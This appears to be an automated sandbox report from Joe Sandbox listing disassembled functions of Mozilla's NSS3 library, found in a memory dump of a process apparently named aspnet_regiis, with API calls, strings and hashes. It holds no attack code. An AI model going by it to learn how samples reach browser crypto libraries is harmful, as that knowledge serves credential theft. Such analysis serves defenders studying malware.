flags = %s %s %s %s, xrefs: 6C3F2A21
slotID = 0x%x, xrefs: 6C3F28D1

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$nMl
API String ID: 2460313690-2777496182
Opcode ID: b3fa7871415ae55d3aa51d459ed231fe45f3bba7db01e44e30e2832feb30ad6a
Instruction ID: f2e2843c82e417250113a461b58f5c0e40a0481805762e88bae1be0b09d8fc70
Opcode Fuzzy Hash: b3fa7871415ae55d3aa51d459ed231fe45f3bba7db01e44e30e2832feb30ad6a
Instruction Fuzzy Hash: 9E5118B5211180EFFB00DB50CE9DE5937E5AB8122DF4A84B9E8549BB12DB36D804CF67

Function 6C496E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C34CA30: EnterCriticalSection.KERNEL32(?,?,?,6C3AF9C9,?,6C3AF4DA,6C3AF9C9,?,?,6C37369A), ref: 6C34CA7A
Part of subcall function 6C34CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C34CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C35BE66), ref: 6C496E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C35BE66), ref: 6C496E98
sqlite3_snprintf.NSS3(?,00000000,6C4FAAF9,?,?,?,?,?,?,6C35BE66), ref: 6C496EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C35BE66), ref: 6C496ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C35BE66), ref: 6C496EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C35BE66), ref: 6C496F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C35BE66), ref: 6C496F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C35BE66), ref: 6C496F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C35BE66), ref: 6C496FA6
sqlite3_snprintf.NSS3(?,00000000,6C4FAAF9,00000000,?,?,?,?,?,?,?,6C35BE66), ref: 6C496FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C35BE66), ref: 6C496FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C35BE66), ref: 6C496FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C35BE66), ref: 6C497014
sqlite3_free.NSS3(00000000,?,?,?,?,6C35BE66), ref: 6C49701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C35BE66), ref: 6C497030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C35BE66), ref: 6C49705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C35BE66), ref: 6C497079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C35BE66), ref: 6C497097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C35BE66), ref: 6C4970A0

Strings

winGetTempname4, xrefs: 6C497046
winGetTempname2, xrefs: 6C4970C4
PMl, xrefs: 6C4970A8
mz_etilqs_, xrefs: 6C496F18
winGetTempname1, xrefs: 6C49708F
winGetTempname5, xrefs: 6C497071

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: PMl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-3052792637
Opcode ID: 8de7431b02853af046fe6b5f47ee9a2b5369308dbe249918783c5f0c2b5e6dd6
Instruction ID: 7813f2f2932e1818f60b496775dc35e378780306c9933dd95ff06f800b619521
Opcode Fuzzy Hash: 8de7431b02853af046fe6b5f47ee9a2b5369308dbe249918783c5f0c2b5e6dd6
Instruction Fuzzy Hash: 65513A71B042212BE700D6309C55FFB3B6A9F92358F144538E91696FC2FB25A51E82D3

Function 6C3F8E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C3F8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F8EB3

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C3F8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C3F8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C3F8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C3F8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C3F8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C3F8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C3F8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C3F9047

Strings

pulWrappedKeyLen = 0x%p, xrefs: 6C3F8FC8
hWrappingKey = 0x%x, xrefs: 6C3F8F01, 6C3F8F11
pMechanism = 0x%p, xrefs: 6C3F8EE0
nMl, xrefs: 6C3F8FEC, 6C3F9023
(CK_INVALID_HANDLE), xrefs: 6C3F8EAC, 6C3F8F1F, 6C3F8F79
C_WrapKey, xrefs: 6C3F8E71
pWrappedKey = 0x%p, xrefs: 6C3F8FAD
hKey = 0x%x, xrefs: 6C3F8F5B, 6C3F8F6B
hSession = 0x%x, xrefs: 6C3F8E8E, 6C3F8E9E
*pulWrappedKeyLen = 0x%x, xrefs: 6C3F9042

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nMl
API String ID: 1003633598-2547372385
Opcode ID: 839099c74bf249b408dcee4bf217af457c727608a9fd6807ff2eb24a55ea11ac
Instruction ID: 4ce4f15f5b61a23dc8718c11c52172ee84b15c7feb30830707d03089cda5ad0b
Opcode Fuzzy Hash: 839099c74bf249b408dcee4bf217af457c727608a9fd6807ff2eb24a55ea11ac
Instruction Fuzzy Hash: AA512535601244AFEB00DF10DD48F9E3BB6AB4331DF064469F9186BA11D735980ACFA7

Function 6C424FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C3D75C2,00000000,00000000,00000001), ref: 6C425009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C3D75C2,00000000), ref: 6C425049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C42505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C425071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C425089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4250A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4250B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C3D75C2), ref: 6C4250CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4250D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4250F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C425103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C42511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C42512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C425145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C425153
free.MOZGLUE(?), ref: 6C42516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C42517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C425195

Strings

library=, xrefs: 6C425043
parameters=, xrefs: 6C42506B
config=, xrefs: 6C42509B
nss=, xrefs: 6C425083
name=, xrefs: 6C425057

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 7afe94e7b4f9787d3857a98ce663dd705300589b42bd0300d6e93d14e423c15b
Instruction ID: 6f2b5b0c9e567988139fec8630a344ae814f26465a2094ae30a9d3058b5dbea0
Opcode Fuzzy Hash: 7afe94e7b4f9787d3857a98ce663dd705300589b42bd0300d6e93d14e423c15b
Instruction Fuzzy Hash: CE51C7B5E012056BEB01DF24DC46EAF77B89F16249F140024EC15E7B45EB2AE919CBF2

Function 6C424C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C414F51,00000000), ref: 6C424C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C414F51,00000000), ref: 6C424C5B
PR_smprintf.NSS3(6C4FAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C414F51,00000000), ref: 6C424C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C414F51,00000000), ref: 6C424CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C424CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C424CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C424D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C414F51,00000000), ref: 6C424D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C414F51,00000000), ref: 6C424D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C424D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C424DA2
free.MOZGLUE(?), ref: 6C424DB9
free.MOZGLUE(00000000), ref: 6C424DCF

Strings

rust, xrefs: 6C424D22
timeout, xrefs: 6C424C91
slotFlags, xrefs: 6C424D34
0x%08lx=[%s %s], xrefs: 6C424D80
ootT, xrefs: 6C424D1A
%s,%s, xrefs: 6C424C4B
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C424D9D
any, xrefs: 6C424C96
every, xrefs: 6C424CA1
rootFlags, xrefs: 6C424D47

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: da0c88cdc3fc3f2722a73dbf3de02ada3ce2a2a1698da8b08f3de3396e2751c0
Instruction ID: 9e1d6608adcc20729edd66b1c65bbfa2a99c818c016c54231b14e3710bf43d2b
Opcode Fuzzy Hash: da0c88cdc3fc3f2722a73dbf3de02ada3ce2a2a1698da8b08f3de3396e2751c0
Instruction Fuzzy Hash: 15419BB1D1014167E712DF199C46EBF7AA5EF82399F0A4128EC164BB01E739E825C7D3

Function 6C3F4950 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C3F4976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F49A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F49B6

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F49CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C3F49FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F4A09
PR_LogPrint.NSS3(?,00000000), ref: 6C3F4A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C3F4A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C3F4A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C3F4A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C3F4B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F4B26
PR_LogPrint.NSS3(?,00000000), ref: 6C3F4B3C

Strings

C_CopyObject, xrefs: 6C3F4971
hObject = 0x%x, xrefs: 6C3F49E4, 6C3F49F4
pTemplate = 0x%p, xrefs: 6C3F4A39
*phNewObject = 0x%x, xrefs: 6C3F4B01, 6C3F4B11
nMl, xrefs: 6C3F4AA6, 6C3F4ADC
(CK_INVALID_HANDLE), xrefs: 6C3F49AF, 6C3F4A02, 6C3F4B1F
phNewObject = 0x%p, xrefs: 6C3F4A77
ulCount = %d, xrefs: 6C3F4A57
hSession = 0x%x, xrefs: 6C3F4991, 6C3F49A1

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject$nMl
API String ID: 1003633598-403085365
Opcode ID: 27100898a436a5a293880b6a7d20944f3cd9b478b69e49529df8d8d57d480c2c
Instruction ID: 26386c27188c79786f1985cdab1c9d9331ad8107238bb0c0fe10e44ee6170724
Opcode Fuzzy Hash: 27100898a436a5a293880b6a7d20944f3cd9b478b69e49529df8d8d57d480c2c
Instruction Fuzzy Hash: 8651E334601140ABDB00DF149E49E9B37B9AB4631DF0A4868F8546BB12D735AD1ACFAB

Function 6C406910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C406943

Part of subcall function 6C424210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,3B4C37C4,flags,?,00000000,?,6C405947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C424220
Part of subcall function 6C424210: NSSUTIL_ArgGetParamValue.NSS3(?,GY@l,?,?,?,?,?,?,00000000,?,00000000,?,6C407703,?,00000000,00000000), ref: 6C42422D
Part of subcall function 6C424210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C407703), ref: 6C42424B
Part of subcall function 6C424210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C407703,?,00000000), ref: 6C424272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C406957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C406972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C406983

Part of subcall function 6C423EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C3FC79F,?,6C406247,70E85609,?,?,6C3FC79F,6C40781D,?,6C3FBD52,00000001,70E85609,D85D8B04,?), ref: 6C423EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4069AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4069BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4069D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4069DF

Part of subcall function 6C424020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,766B4C80,?,6C4250B7,?), ref: 6C424041

free.MOZGLUE(00000000), ref: 6C4069F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C406A04
free.MOZGLUE(00000000), ref: 6C406A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C406A29
free.MOZGLUE(00000000), ref: 6C406A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C406A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C406A5B

Strings

certPrefix=, xrefs: 6C4069B8
nokeydb, xrefs: 6C406968
readOnly, xrefs: 6C40693D
nocertdb, xrefs: 6C406951
configdir=, xrefs: 6C4069A4
flags, xrefs: 6C406937, 6C406942, 6C406956, 6C40696D
keyPrefix=, xrefs: 6C4069CC

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: ebb5013d8396d74d0bd3d8f20926898a3b6f9848ac8b1dde84e7cf58b72ac3db
Instruction ID: 985a5e56a02a2b487ed980f96f7c684d020f0e0367b74779d9462224a9c9317d
Opcode Fuzzy Hash: ebb5013d8396d74d0bd3d8f20926898a3b6f9848ac8b1dde84e7cf58b72ac3db
Instruction Fuzzy Hash: 864163B5F802056BE700DB75AC82F9B77ACAF55248F140434ED06E6B42F735DA588AE1

Function 6C406CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C406910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C406943
Part of subcall function 6C406910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C406957
Part of subcall function 6C406910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C406972
Part of subcall function 6C406910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C406983
Part of subcall function 6C406910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4069AA
Part of subcall function 6C406910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4069BE
Part of subcall function 6C406910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4069D2
Part of subcall function 6C406910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4069DF
Part of subcall function 6C406910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C406A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C406D8C
free.MOZGLUE(00000000), ref: 6C406DC5
free.MOZGLUE(?), ref: 6C406DD6
free.MOZGLUE(?), ref: 6C406DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C406E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C406E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C406E72
free.MOZGLUE(?), ref: 6C406EA7
free.MOZGLUE(?), ref: 6C406EC4
free.MOZGLUE(?), ref: 6C406ED5
free.MOZGLUE(00000000), ref: 6C406EE3
free.MOZGLUE(?), ref: 6C406EF4
free.MOZGLUE(?), ref: 6C406F08
free.MOZGLUE(00000000), ref: 6C406F35
free.MOZGLUE(?), ref: 6C406F44
free.MOZGLUE(?), ref: 6C406F5B
free.MOZGLUE(00000000), ref: 6C406F65

Part of subcall function 6C406C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C40781D,00000000,6C3FBE2C,?,6C406B1D,?,?,?,?,00000000,00000000,6C40781D), ref: 6C406C40
Part of subcall function 6C406C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C40781D,?,6C3FBE2C,?), ref: 6C406C58
Part of subcall function 6C406C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C40781D), ref: 6C406C6F
Part of subcall function 6C406C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C406C84
Part of subcall function 6C406C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C406C96
Part of subcall function 6C406C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C406CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C406F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C406FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C406FF4

Strings

+`Al, xrefs: 6C406D0D

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`Al
API String ID: 1304971872-3016126260
Opcode ID: 25cb76b9e1fda2305134cef4a0958b5fc8b39cbcc4f37f2c2ee0724d710ec241
Instruction ID: 0e861aa7399b330e405e354e7dc278e90ad820f6a229f56a04df8e5f20184a3b
Opcode Fuzzy Hash: 25cb76b9e1fda2305134cef4a0958b5fc8b39cbcc4f37f2c2ee0724d710ec241
Instruction Fuzzy Hash: 1FB14BB0F412099BDF01DBA5D885FDEBBB8AF05249F140038EC16E7B41E735A985CBA1

Function 6C3F89B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6C3F89D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F8A04
